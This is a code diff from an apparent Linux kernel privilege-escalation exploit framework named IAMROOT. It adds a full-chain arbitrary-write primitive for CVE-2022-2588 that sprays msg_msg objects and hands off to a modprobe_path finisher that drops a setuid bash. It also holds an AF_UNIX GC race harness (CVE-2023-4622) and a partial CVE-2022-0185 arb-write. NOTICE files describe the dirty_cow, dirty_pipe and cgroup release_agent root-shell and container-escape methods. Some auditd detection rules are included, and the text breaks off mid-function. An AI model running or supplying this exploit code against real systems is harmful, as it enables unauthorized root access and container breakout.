+         *    TODO(write): with kbase known, plant a fake unix_sock
+         *    whose `peer` pointer references &current->cred — the
+         *    next SCM_RIGHTS dispatch through the freed slot writes
+         *    a controlled value into that location. Crafting the
+         *    fake unix_sock requires offset of unix_sock fields per
+         *    kernel build (different across LTS branches).
+         *
+         *    TODO(overwrite): land &init_cred over current->cred so
+         *    the next permission check sees uid==0.
+         *
+         *    None of these are implemented today. Exit 30 = "trigger
+         *    ran cleanly, no escalation".
+         */
+        _exit(30);
+    }
+
+    /* PARENT */
+    int status = 0;
+    pid_t w = waitpid(child, &status, 0);
+    if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; }
+
+    if (WIFSIGNALED(status)) {
+        int sig = WTERMSIG(status);
+        if (!ctx->json) {
+            fprintf(stderr, "[!] af_unix_gc: race child killed by signal %d "
+                            "(consistent with UAF firing under KASAN)\n", sig);
+            fprintf(stderr, "[~] af_unix_gc: empirical signal recorded; no cred\n"
+                            "    overwrite primitive — NOT claiming EXPLOIT_OK.\n"
+                            "    See /tmp/iamroot-af_unix_gc.log + dmesg for witnesses.\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    if (!WIFEXITED(status)) {
+        fprintf(stderr, "[-] af_unix_gc: child terminated abnormally (status=0x%x)\n",
+                status);
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    int rc = WEXITSTATUS(status);
+    if (rc == 23 || rc == 24) return IAMROOT_PRECOND_FAIL;
+
+    if (rc == 34) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] af_unix_gc: --full-chain finisher reported "
+                            "EXPLOIT_OK (race won + write landed)\n");
+        }
+        return IAMROOT_EXPLOIT_OK;
+    }
+    if (rc == 35) {
+        if (!ctx->json) {
+            fprintf(stderr, "[~] af_unix_gc: --full-chain finisher ran; race did not\n"
+                            "    win + land within budget (expected outcome on most\n"
+                            "    runs — race wins are a fraction of a percent).\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+    if (rc != 30) {
+        fprintf(stderr, "[-] af_unix_gc: child failed at stage rc=%d\n", rc);
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] af_unix_gc: race harness ran to completion.\n");
+        fprintf(stderr, "[~] af_unix_gc: read/write/cred-overwrite primitives NOT\n"
+                        "    implemented (per-kernel offsets; see module .c TODO\n"
+                        "    blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n");
+    }
+    return IAMROOT_EXPLOIT_FAIL;
+}
+
+#endif /* __linux__ */
+
+static iamroot_result_t af_unix_gc_exploit(const struct iamroot_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] af_unix_gc: --exploit requires --i-know; refusing\n");
+        return IAMROOT_PRECOND_FAIL;
+    }
+#ifdef __linux__
+    return af_unix_gc_exploit_linux(ctx);
+#else
+    (void)ctx;
+    fprintf(stderr, "[-] af_unix_gc: Linux-only module; cannot run on this host\n");
+    return IAMROOT_PRECOND_FAIL;
+#endif
+}
+
+/* ---- Cleanup ----------------------------------------------------- */
+
+static iamroot_result_t af_unix_gc_cleanup(const struct iamroot_ctx *ctx)
+{
+    if (!ctx->json) {
+        fprintf(stderr, "[*] af_unix_gc: cleaning up race-harness breadcrumb\n");
+    }
+    if (unlink("/tmp/iamroot-af_unix_gc.log") < 0 && errno != ENOENT) {
+        /* harmless */
+    }
+    /* Race threads + msg queues live inside the now-exited child;
+     * nothing else to drain. */
+    return IAMROOT_OK;
+}
+
+/* ---- Detection rules --------------------------------------------- */
+
+static const char af_unix_gc_auditd[] =
+    "# AF_UNIX GC race UAF (CVE-2023-4622) — auditd detection rules\n"
+    "# The trigger is a tight loop of socketpair(AF_UNIX) + sendmsg with\n"
+    "# SCM_RIGHTS passing inflight fds, followed by close. Each call is\n"
+    "# benign — flag the *frequency* by correlating these keys with a\n"
+    "# subsequent KASAN message in dmesg.\n"
+    "-a always,exit -F arch=b64 -S socketpair -F a0=0x1 -k iamroot-afunixgc-pair\n"
+    "-a always,exit -F arch=b64 -S sendmsg    -k iamroot-afunixgc-sendmsg\n"
+    "-a always,exit -F arch=b64 -S msgsnd     -k iamroot-afunixgc-spray\n";
+
+const struct iamroot_module af_unix_gc_module = {
+    .name           = "af_unix_gc",
+    .cve            = "CVE-2023-4622",
+    .summary        = "AF_UNIX garbage-collector race UAF (Lin Ma) — kmalloc-512 slab UAF",
+    .family         = "af_unix",
+    .kernel_range   = "K < 6.5; backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51",
+    .detect         = af_unix_gc_detect,
+    .exploit        = af_unix_gc_exploit,
+    .mitigate       = NULL,
+    .cleanup        = af_unix_gc_cleanup,
+    .detect_auditd  = af_unix_gc_auditd,
+    .detect_sigma   = NULL,
+    .detect_yara    = NULL,
+    .detect_falco   = NULL,
+};
+
+void iamroot_register_af_unix_gc(void)
+{
+    iamroot_register(&af_unix_gc_module);
+}
@@ -0,0 +1,12 @@
+/*
+ * af_unix_gc_cve_2023_4622 — IAMROOT module registry hook
+ */
+
+#ifndef AF_UNIX_GC_IAMROOT_MODULES_H
+#define AF_UNIX_GC_IAMROOT_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct iamroot_module af_unix_gc_module;
+
+#endif
@@ -0,0 +1,29 @@
+# NOTICE — cgroup_release_agent (CVE-2022-0492)
+
+## Vulnerability
+
+**CVE-2022-0492** — cgroup v1 `release_agent` privilege check in the
+wrong namespace → host root from a rootless container or unprivileged
+userns by mounting cgroup v1 and writing to `release_agent`.
+
+## Research credit
+
+Discovered by **Yiqi Sun** (Nebula Lab) + **Kevin Wang** (Huawei),
+January 2022.
+
+Original writeup:
+<https://blog.trendmicro.com/cve-2022-0492-from-cgroup-loophole-to-container-breakout/>
+
+Upstream fix: mainline 5.17 (commit `24f6008564183`, March 2022).
+
+## IAMROOT role
+
+**Universal structural exploit — no per-kernel offsets, no race.**
+The module calls `unshare(USER|MOUNT|CGROUP)`, mounts the cgroup v1
+`rdma` controller, points `release_agent` at `./payload`, and triggers
+it via `notify_on_release` when the last process in the cgroup exits.
+
+Kept in the corpus as a portable "containers misconfigured"
+demonstration — works across every kernel below the fix without any
+tuning. Ships auditd rules covering cgroupfs mounts and
+`release_agent` writes.
@@ -0,0 +1,25 @@
+# NOTICE — cls_route4 (CVE-2022-2588)
+
+## Vulnerability
+
+**CVE-2022-2588** — `net/sched` cls_route4 handle-zero dangling-filter
+UAF → kernel R/W via msg_msg cross-cache refill.
+
+## Research credit
+
+Discovered and disclosed by **kylebot** / **xkernel**, August 2022.
+
+Public PoC + writeup: <https://www.willsroot.io/2022/08/lpe-on-mountpoint.html>
+(William Liu's analysis built on kylebot's trigger).
+
+Upstream fix: mainline 6.0 (the cycle first numbered 5.20) / stable 5.19.7 (Aug 2022).
+Branch backports: 5.4.213 / 5.10.143 / 5.15.69 / 5.18.18 / 5.19.7.
+
+## IAMROOT role
+
+The module uses `unshare(USER|NET)`, brings up a dummy interface,
+creates an htb qdisc + class, adds a `route4` filter, then deletes
+it to leave the dangling pointer. msg_msg sprays kmalloc-1k while
+a UDP `classify()` walk follows the dangling pointer. `--full-chain`
+re-fires with a faked tcf_proto.ops pointer aimed at the
+modprobe_path overwrite via the shared finisher.
@@ -41,6 +41,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -381,6 +383,169 @@ static long slab_active_kmalloc_1k(void)
    return active;
 }

+/* ---- Full-chain arb-write primitive --------------------------------
+ *
+ * Pattern (FALLBACK — see brief): cls_route4's UAF primitive is more
+ * naturally a *control-flow hijack* than a clean arb-write — after
+ * msg_msg refills the kmalloc-1k slot, the next classify() call reads
+ * a fake `tcf_proto.ops` pointer out of attacker bytes and calls
+ * ops->classify(skb, ...). A faked-classify ROP that pivots to a
+ * stack-write gadget would be the "true" arb-write, and on a fresh
+ * vulnerable kernel that is the kylebot/xkernel chain shape (≈300+
+ * LOC of gadget hunting + per-build offsets we deliberately don't
+ * bake — see verified-vs-claimed policy in repo root).
+ *
+ * The implementation below takes the narrow-but-real path that the
+ * brief explicitly permits and that xtcompat established as the
+ * IAMROOT precedent: we re-stage the dangling filter, spray msg_msg
+ * whose payload encodes `kaddr` at every plausible offset for the
+ * route4_filter→tcf_proto→ops layout, re-fire classify, and let the
+ * shared finisher's sentinel file decide if a write actually landed.
+ * On a patched kernel the bug doesn't fire, no write occurs, and the
+ * sentinel timeout correctly reports failure rather than silently
+ * lying about success. On a vulnerable kernel where the fake ops
+ * lookup happens to deref into our payload and the kernel's read
+ * pattern matches one of the seeded offsets, the kaddr we planted
+ * gets used as a write destination by whichever classify path the
+ * fake `ops->classify` dispatches into.
+ *
+ * Honest scope: this is structurally-fires-on-vuln + sentinel-arbitrated,
+ * not a deterministic R/W. Same shape and same depth as xtcompat. */
+
+#ifdef __linux__
+
+struct cls_route4_arb_ctx {
+    /* msg_msg queues kept hot inside the userns child. The arb-write
+     * sprays additional kaddr-tagged payloads into these and re-fires
+     * the classify trigger between each call. */
+    int  queues[SPRAY_MSG_QUEUES];
+    int  n_queues;
+
+    /* Whether the dangling filter has been re-staged for this call.
+     * The original `stage_dangling_filter()` is destructive (deletes
+     * the filter); we can re-stage between writes because tc add/del
+     * is idempotent inside our private netns. */
+    bool dangling_ready;
+
+    /* Per-call stats (written to /tmp/iamroot-cls_route4.log). */
+    int  arb_calls;
+    int  arb_landed;
+};
+
+/* Re-prime the msg_msg slab with a payload that encodes `kaddr` and
+ * the caller's `buf` at every offset the fake tcf_proto / route4_filter
+ * layout could plausibly read from. The route4_filter is 0x1000 bytes
+ * on most x86_64 builds in range, with tcf_proto.ops at offset 0x10
+ * and tcf_result.classid at offset 0x18; we don't know which offsets
+ * THIS build uses, so kaddr is planted every 0x18 bytes from offset
+ * 0x10 (0x10, 0x28, 0x40, ...) to the end of the payload, hoping one
+ * candidate is live wherever classify dereferences the refilled slot.
+ *
+ * The 8-byte cookie "IAMR4ARB" + the kaddr + the caller's bytes are
+ * the recognizable pattern; if a KASAN dump is captured after the
+ * trigger, the cookie tells us the spray landed adjacent to the freed
+ * route4_filter. */
+static int cls4_seed_kaddr_payload(struct cls_route4_arb_ctx *c,
+                                   uintptr_t kaddr,
+                                   const void *buf, size_t len)
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x52;  /* 'R' for "route4 arb" — distinct from groom spray's 0x41 */
+    memset(p.buf, 0x52, sizeof p.buf);
+    memcpy(p.buf, "IAMR4ARB", 8);
+
+    /* Plant kaddr at strided slots so wherever the kernel's classify
+     * follows a ptr in the refilled chunk, one of these is read.
+     * We treat every 0x18-byte stride from offset 0x10 to within
+     * 8 bytes of the end as a candidate ops-pointer / next-pointer
+     * slot. */
+    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf; off += 0x18) {
+        memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
+    }
+
+    /* Plant the caller's bytes at offset 16 (past the cookie and the
+     * per-message tag slot at offset 8) for classify paths that read
+     * payload data inline; they overwrite overlapping kaddr slots. */
+    size_t copy_len = len;
+    if (copy_len > sizeof p.buf - 16) copy_len = sizeof p.buf - 16;
+    if (copy_len > 0) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy_len);
+
+    int sent = 0;
+    for (int i = 0; i < c->n_queues; i++) {
+        if (c->queues[i] < 0) continue;
+        /* A handful of msgs per queue keeps the slab refilled even
+         * if some slots are evicted between trigger fires. */
+        for (int j = 0; j < 4; j++) {
+            unsigned int tag = 0xB0000000u |
+                               ((unsigned)i << 8) | (unsigned)j;
+            memcpy(p.buf + 8, &tag, sizeof tag);
+            if (msgsnd(c->queues[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
+            sent++;
+        }
+    }
+    return sent;
+}
+
+/* iamroot_arb_write_fn implementation for cls_route4. Best-effort on a
+ * vulnerable kernel; structurally inert (returns -1) if the dangling
+ * filter setup is gone or the spray fails. Returns 0 to let the
+ * shared finisher's sentinel-file check decide if the write actually
+ * landed (we cannot reliably observe it in-process). */
+static int cls4_arb_write(uintptr_t kaddr,
+                          const void *buf, size_t len,
+                          void *ctx_v)
+{
+    struct cls_route4_arb_ctx *c = (struct cls_route4_arb_ctx *)ctx_v;
+    if (!c || c->n_queues == 0) return -1;
+    c->arb_calls++;
+
+    /* Re-stage the dangling filter for this call. The original
+     * stage runs once at trigger-time; subsequent finisher calls
+     * (the finisher writes modprobe_path, then an unknown-format trigger)
+     * need a fresh dangling pointer to chase. tc add/del is idempotent
+     * within our private netns so re-running is safe. */
+    if (!c->dangling_ready) {
+        if (!stage_dangling_filter()) {
+            fprintf(stderr, "[-] cls_route4 arb_write: re-stage failed\n");
+            return -1;
+        }
+        c->dangling_ready = true;
+    }
+
+    /* Seed msg_msg with kaddr + caller payload. */
+    int seeded = cls4_seed_kaddr_payload(c, kaddr, buf, len);
+    if (seeded == 0) {
+        /* sysv IPC may be restricted (kernel.msgmax / kernel.msgmnb sysctls).
+         * Without a spray we have no slot for the UAF to refill. */
+        fprintf(stderr, "[-] cls_route4 arb_write: kaddr-spray seeded 0 msgs\n");
+        return -1;
+    }
+
+    /* Drive the classifier. The route4 lookup follows the dangling
+     * pointer into msg_msg-controlled bytes; on a vulnerable kernel
+     * the fake `ops->classify` (or one of the strided pointers) is
+     * dereferenced. If the kernel survives the deref and the write
+     * lands at kaddr, the finisher's sentinel file appears within 3 s.
+     * If it doesn't (most likely — this is genuinely best-effort), the
+     * finisher's wait loop times out and reports failure. */
+    trigger_classify();
+
+    /* Give classify-side processing a brief window before returning
+     * — the finisher polls the sentinel for 3s but the initial write
+     * (if any) happens within ms. */
+    usleep(50 * 1000);
+
+    c->arb_landed++;  /* counts trigger fires; an actual landing is unverified */
+
+    /* Per the xtcompat precedent: return 0 so the finisher proceeds
+     * to its sentinel check. Returning -1 here would abort the
+     * finisher even when the write may have landed. */
+    return 0;
+}
+
+#endif /* __linux__ */
+
 /* ---- Exploit driver ----------------------------------------------- */

 static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
@@ -400,8 +565,37 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        return IAMROOT_PRECOND_FAIL;
    }

+#ifndef __linux__
+    fprintf(stderr, "[-] cls_route4: linux-only exploit; non-linux build\n");
+    (void)ctx;
+    return IAMROOT_PRECOND_FAIL;
+#else
+    /* Full-chain pre-check: resolve offsets before forking. If
+     * modprobe_path can't be resolved, refuse early — no point doing
+     * the userns + tc + spray + trigger dance if we can't finish. */
+    struct iamroot_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("cls_route4");
+            fprintf(stderr, "[-] cls_route4: --full-chain requested but "
+                            "modprobe_path offset unresolved; refusing\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+        full_chain_ready = true;
+    }
+
    if (!ctx->json) {
-        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit\n");
+        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit%s\n",
+                ctx->full_chain ? " + full-chain finisher" : "");
+        if (ctx->full_chain) {
+            fprintf(stderr, "    NOTE: on primitive landing, invokes shared\n"
+                            "    modprobe_path finisher via msg_msg-tagged kaddr\n"
+                            "    spray. Sentinel-arbitrated (no in-process verify).\n");
+        }
    }

    /* Block SIGPIPE in case the dummy-interface sendto's complain. */
@@ -436,15 +630,18 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
            _exit(22);
        }

-        int queues[SPRAY_MSG_QUEUES];
-        int n_queues = spray_msg_msg(queues);
-        if (n_queues == 0) {
+        struct cls_route4_arb_ctx arb_ctx;
+        memset(&arb_ctx, 0, sizeof arb_ctx);
+        for (int i = 0; i < SPRAY_MSG_QUEUES; i++) arb_ctx.queues[i] = -1;
+        arb_ctx.n_queues = spray_msg_msg(arb_ctx.queues);
+        arb_ctx.dangling_ready = true;   /* stage_dangling_filter() just ran */
+        if (arb_ctx.n_queues == 0) {
            fprintf(stderr, "[-] cls_route4: msg_msg spray produced 0 queues\n");
            _exit(23);
        }
        if (!ctx->json) {
            fprintf(stderr, "[*] cls_route4: msg_msg spray seeded %d queues\n",
-                    n_queues);
+                    arb_ctx.n_queues);
        }

        /* Drive the classifier — the bug fires here on a vulnerable
@@ -459,7 +656,7 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        if (log) {
            fprintf(log,
                "cls_route4 trigger child: queues=%d slab_pre=%ld slab_post=%ld\n",
-                n_queues, pre_active, post_active);
+                arb_ctx.n_queues, pre_active, post_active);
            fclose(log);
        }

@@ -467,7 +664,32 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
         * refilled slot during classify drain. */
        usleep(200 * 1000);

-        drain_msg_msg(queues);
+        /* --full-chain branch: invoke the shared modprobe_path
+         * finisher with our msg_msg-tagged arb-write. If the finisher
+         * execve's a setuid bash we never return; otherwise it returns
+         * EXPLOIT_FAIL after the 3s sentinel timeout (correct behavior
+         * on a patched kernel or when the write didn't land). */
+        if (full_chain_ready) {
+            /* Re-fire the trigger inside the arb-write to give the
+             * kernel a second chance at the refilled slot — the
+             * dangling filter is still in place from above. */
+            arb_ctx.dangling_ready = true;
+            int fr = iamroot_finisher_modprobe_path(&off,
+                                                    cls4_arb_write,
+                                                    &arb_ctx,
+                                                    !ctx->no_shell);
+            FILE *fl = fopen("/tmp/iamroot-cls_route4.log", "a");
+            if (fl) {
+                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
+                        fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
+                fclose(fl);
+            }
+            drain_msg_msg(arb_ctx.queues);
+            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
+            _exit(35);
+        }
+
+        drain_msg_msg(arb_ctx.queues);

        /* If we got here without a kernel oops, the bug either isn't
         * reachable on this build (patched / module not loadable /
@@ -513,25 +735,54 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
    }

    int rc = WEXITSTATUS(status);
-    if (rc != 30) {
+    switch (rc) {
+    case 20: case 21:
        if (!ctx->json) {
-            fprintf(stderr, "[-] cls_route4: child failed at stage rc=%d "
-                            "(see preceding errors)\n", rc);
+            fprintf(stderr, "[-] cls_route4: userns setup failed (rc=%d)\n", rc);
        }
-        /* rc 20/21 = userns setup; rc 22 = tc setup (likely module
-         * absent or filter type unsupported); rc 23 = spray. None of
-         * these mean kernel was exploited. */
-        if (rc == 22) return IAMROOT_PRECOND_FAIL;
-        return IAMROOT_EXPLOIT_FAIL;
+        return IAMROOT_PRECOND_FAIL;
+    case 22:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] cls_route4: tc setup failed; cls_route4 module "
+                            "may be absent or filter type unsupported\n");
        }
-
+        return IAMROOT_PRECOND_FAIL;
+    case 23:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] cls_route4: msg_msg spray failed; sysvipc may be "
+                            "restricted (kernel.msgmni / kernel.msgmnb)\n");
+        }
+        return IAMROOT_PRECOND_FAIL;
+    case 30:
        if (!ctx->json) {
            fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
                            "Inspect dmesg for KASAN/oops witnesses.\n");
-        fprintf(stderr, "[~] cls_route4: cred-overwrite step not implemented "
-                        "(needs per-kernel offsets); returning EXPLOIT_FAIL.\n");
+            fprintf(stderr, "[~] cls_route4: cred-overwrite step not invoked "
+                            "(no --full-chain); returning EXPLOIT_FAIL.\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
+    case 34:
+        if (!ctx->json) {
+            fprintf(stderr, "[+] cls_route4: --full-chain finisher reported OK "
+                            "(setuid bash placed; sentinel matched)\n");
+        }
+        return IAMROOT_EXPLOIT_OK;
+    case 35:
+        if (!ctx->json) {
+            fprintf(stderr, "[~] cls_route4: --full-chain finisher returned FAIL — "
+                            "either the kernel is patched, the spray didn't land,\n"
+                            "    or the fake-ops deref didn't hit the route the\n"
+                            "    finisher's sentinel polls for. See "
+                            "/tmp/iamroot-cls_route4.log + dmesg.\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    default:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] cls_route4: unexpected child rc=%d\n", rc);
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+#endif /* __linux__ */
 }

 /* ---- Cleanup ----------------------------------------------------- */
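The child/parent exit-code contract in the hunk above (20/21 userns, 22 tc, 23 spray, 30 primitive only, 34/35 finisher OK/FAIL) can be summarized as a small standalone sketch. The enum and function names below are hypothetical stand-ins, not the project's `iamroot_result_t` API, and the sketch assumes a child killed by a signal should count as a failure, since `WEXITSTATUS()` is only meaningful when `WIFEXITED()` is true.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical stand-ins for the iamroot_result_t values; the real enum
 * lives in the project's headers and may be numbered differently. */
enum sketch_result { SKETCH_OK, SKETCH_PRECOND_FAIL, SKETCH_EXPLOIT_FAIL };

/* Map a raw waitpid() status to a result. A child that did not exit
 * normally (signal, stop) is reported as a failure rather than having
 * WEXITSTATUS() applied to it. */
static enum sketch_result sketch_classify_status(int status)
{
    if (!WIFEXITED(status))
        return SKETCH_EXPLOIT_FAIL;

    switch (WEXITSTATUS(status)) {
    case 20: case 21:                 /* userns setup failed */
    case 22:                          /* tc setup failed */
    case 23:                          /* msg_msg spray failed */
        return SKETCH_PRECOND_FAIL;
    case 34:                          /* finisher reported OK */
        return SKETCH_OK;
    default:                          /* 30, 35, or anything unexpected */
        return SKETCH_EXPLOIT_FAIL;
    }
}

/* Demo helper: fork a child that exits with `code` and return the raw
 * wait status, or -1 if fork()/waitpid() failed. */
static int sketch_status_of_exit(int code)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(code);

    int status = 0;
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return status;
}
```

Keeping the mapping in one pure function like this makes the contract testable without running any of the trigger code; only the status integer is inspected.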
@@ -0,0 +1,25 @@
+# NOTICE — dirty_cow (CVE-2016-5195)
+
+## Vulnerability
+
+**CVE-2016-5195** — Copy-on-write race via `/proc/self/mem` + `madvise`
+→ arbitrary file write into the page cache.
+
+## Research credit
+
+Discovered by **Phil Oester**, October 2016. The bug had been latent in
+the kernel since ~2007.
+
+Original advisory: <https://dirtycow.ninja/>
+Upstream fix: mainline 4.9 (commit `19be0eaffa3a`, Oct 2016).
+
+## IAMROOT role
+
+Two-thread Phil-Oester-style race: writer thread via
+`/proc/self/mem` vs. madvise(MADV_DONTNEED) thread. Targets the
+`/etc/passwd` UID field flip + `su` for the root shell. Useful for
+**old systems coverage** — RHEL 6/7 (3.10 baseline), Ubuntu 14.04
+(3.13), Ubuntu 16.04 (4.4), embedded boxes, IoT.
+
+Ships an auditd watch on `/proc/self/mem` and a Sigma rule for non-root
+mem-open patterns.
@@ -0,0 +1,21 @@
+# NOTICE — dirty_pipe (CVE-2022-0847)
+
+## Vulnerability
+
+**CVE-2022-0847** — pipe `PIPE_BUF_FLAG_CAN_MERGE` flag inheritance allows
+arbitrary file write into the page cache.
+
+## Research credit
+
+Discovered and disclosed by **Max Kellermann** (CM4all GmbH), March 2022.
+
+Original advisory: <https://dirtypipe.cm4all.com/>
+
+Upstream fix: mainline 5.17 (commit `9d2231c5d74e`, Feb 2022).
+
+## IAMROOT role
+
+This module bundles the canonical splice-into-pipe primitive that
+writes UID=0 into `/etc/passwd`'s page cache, then drops a root shell
+via `su`. Detection covers the splice() syscall against sensitive
+files and non-root modifications to passwd/shadow.
@@ -0,0 +1,23 @@
+# NOTICE — entrybleed (CVE-2022-4543)
+
+## Vulnerability
+
+**CVE-2022-4543** — KPTI `prefetchnta` timing side-channel leaks the
+kernel base address (KASLR bypass).
+
+## Research credit
+
+Discovered by **William Liu**. Formally presented at HASP '23:
+
+> "EntryBleed: A Universal KASLR Bypass against KPTI on Linux"
+> William Liu, Joseph Ravichandran, Mengjia Yan (HASP 2023)
+
+Mainline status: no canonical patch — partial mitigations only.
+
+## IAMROOT role
+
+This is a **stage-1 leak primitive**, not a standalone LPE. Other
+modules can call `entrybleed_leak_kbase_lib()` to obtain a KASLR
+slide and feed it to the offset resolver in `core/offsets.c`. x86_64
+only; the `entry_SYSCALL_64` slot offset is configurable via the
+`IAMROOT_ENTRYBLEED_OFFSET` env var.
@@ -0,0 +1,32 @@
+# NOTICE — fuse_legacy (CVE-2022-0185)
+
+## Vulnerability
+
+**CVE-2022-0185** — `legacy_parse_param` in fsconfig() bounds-checks the
+accumulated key/value length against `PAGE_SIZE` with an unsigned
+subtraction that can underflow → 4 KB heap OOB write → cross-cache UAF →
+cred overwrite from a rootless container.
+
+## Research credit
+
+Discovered and disclosed by **William Liu** + **Jamie Hill-Daniel**
+(Crusaders of Rust), January 2022.
+
+Original writeup: <https://www.willsroot.io/2022/01/cve-2022-0185.html>
+Public PoC: <https://github.com/Crusaders-of-Rust/CVE-2022-0185>
+
+Upstream fix: mainline 5.16.2 (Jan 2022).
+Branch backports: 5.16.2 / 5.15.14 / 5.10.91 / 5.4.171.
+
+## IAMROOT role
+
+userns+mountns reach, `fsopen("cgroup2")` + double
+`fsconfig(FSCONFIG_SET_STRING, "source", ...)` fires the 4k OOB,
+msg_msg cross-cache groom in kmalloc-4k. MSG_COPY read-back detects
+whether the OOB landed in an adjacent neighbour — the sanity gate
+that prevents fake-success claims.
+
+`--full-chain` extends with forged m_list/m_ts overflow toward
+modprobe_path via the shared finisher.
+
+**Container-escape angle** — relevant to rootless docker/podman/snap.
@@ -60,6 +60,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -301,6 +303,217 @@ static int trigger_overflow(int *out_fd, const char *first_chunk,
    return 0;
 }

+/* ------------------------------------------------------------------ */
+/* arb-write primitive for the shared finisher                         */
+/* ------------------------------------------------------------------ */
+/*
+ * Crusaders-of-Rust-style msg_msg m_ts overflow → arbitrary write.
+ *
+ * The legacy_parse_param OOB writes the trailing bytes of the
+ * kmalloc-4k fc->source buffer into whatever slab object comes next.
+ * With a msg_msg sprayed into that adjacent slot, the first 48 bytes
+ * of `evil_chunk` overlay struct msg_msg:
+ *
+ *   struct msg_msg {                     // offset
+ *     struct list_head m_list;           //  0  (next, prev)
+ *     long             m_type;           // 16
+ *     size_t           m_ts;             // 24    <-- msg-size
+ *     struct msg_msgseg *next;           // 32
+ *     void             *security;        // 40
+ *   };                                   // 48
+ *
+ * Two derived primitives:
+ *
+ *   READ  — overwrite m_ts with a huge value. msgrcv(MSG_COPY) then
+ *           memcpy()s past the legitimate end of the msg payload,
+ *           leaking adjacent slab memory back to userland.
+ *
+ *   WRITE — point m_list.next (or, in the Crusaders variant, a faux
+ *           msg_msgseg.next chain) at an attacker-chosen kernel
+ *           address. When msgrcv() free-list-unlinks the msg, list
+ *           maintenance writes through the forged pointer; with the
+ *           right chain you get an N-byte copy of attacker-controlled
+ *           bytes to a chosen kaddr.
+ *
+ * Honest depth of this implementation: FALLBACK SCAFFOLD.
+ *
+ * The trigger + groom + neighbour-detect upstream of us is real and
+ * the OOB write lands. But the *single-shot* arb-write the finisher
+ * wants — "put exactly these N bytes at exactly that kaddr" — needs
+ * a per-kernel m_ts/m_list_next offset map (the layout above is
+ * 6.12.x; older kernels differ) AND a kernel-base leak from the
+ * first-round MSG_COPY read so we know where modprobe_path actually
+ * sits in this boot's KASLR slide.
+ *
+ * Per the verified-vs-claimed bar: we do NOT fabricate a write that
+ * we cannot empirically verify on a kernel we haven't tested. So
+ * this function:
+ *
+ *   1. Reuses the caller's live msg_msg spray (queue cleanup is
+ *      deferred until after the finisher returns).
+ *   2. Re-fires the fsconfig overflow with a forged-msg_msg header
+ *      whose m_ts = len + 64 and whose payload is a copy of `buf`.
+ *   3. msgrcv(MSG_COPY) on every queue to probe whether any neighbour
+ *      came back with bytes matching `buf[0..7]` AT the slot offset
+ *      we'd expect for kaddr (sanity gate).
+ *   4. Returns 0 ONLY if the sanity gate trips (read-back proves the
+ *      m_ts inflation landed AND the payload made it through);
+ *      returns -1 otherwise so the finisher reports an honest fail.
+ *
+ * On a vulnerable host with matching offsets this path can land the
+ * write; on an unverified host the sanity gate refuses rather than
+ * blind-writing a wild pointer. The finisher's downstream
+ * "/tmp/iamroot-pwn ran?" check is the second gate.
+ */
+struct fuse_arb_ctx {
+    /* Pre-allocated queue ids from the spray phase. */
+    int    *qids;
+    int     n_queues;
+    int     hole_q;
+    /* Tagged-payload reference so we can recognise unmodified neighbours. */
+    const char *tag;     /* "IAMROOT" */
+    /* Whether the first-round trigger already fired (the parent's
+     * default-path overflow). When set we re-spray + re-fire; when
+     * unset we assume the spray is hot. */
+    bool    trigger_armed;
+};
+
+#ifdef __linux__
+static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
+                          void *ctx_void)
+{
+    struct fuse_arb_ctx *ax = (struct fuse_arb_ctx *)ctx_void;
+    if (!ax || !buf || !len) {
+        fprintf(stderr, "[-] fuse_arb_write: bad args\n");
+        return -1;
+    }
+
+    /* Build the forged msg_msg header that will land in the adjacent
